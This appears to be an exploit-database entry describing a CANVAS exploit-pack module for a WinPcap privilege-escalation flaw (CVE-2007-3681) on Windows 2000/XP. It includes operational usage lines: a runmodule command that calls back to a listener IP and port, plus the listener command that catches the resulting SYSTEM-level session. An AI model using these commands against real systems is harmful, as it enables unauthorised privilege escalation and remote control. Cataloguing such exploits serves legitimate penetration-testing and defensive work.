Name | winpcap |
CVE | CVE-2007-3681 |
Exploit Pack | CANVAS |
Description | winpcap |
Notes | CVE Name: CVE-2007-3681 VENDOR: WinPcap.org URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=550 Notes: This exploit will auto-target based on reading a kernel file on Windows 2000 or XP. It will generate a target fingerprint when you run the auto-targeter - this is useful when you don't have read access to the kernel files and still want to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds #example commandline usage on Windows 2000 SP4 English #we set our callback IP to 10.10.10.6 in the test lab runmodule winpcap -l 10.10.10.6 -d 5555 Make sure you have a listener listening already before you run the above command. ./commandlineInterface -v 1 -p 5555 If you get the wrong version, (-v 1 on an XP box, say) you'll see an ACCESS_VIOLATION bluescreen. Then it will dump memory. Date public: 07/09/2007 CVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3681 CVSS: 6.6 |
Learn more about the CANVAS Exploit Pack here: CANVAS |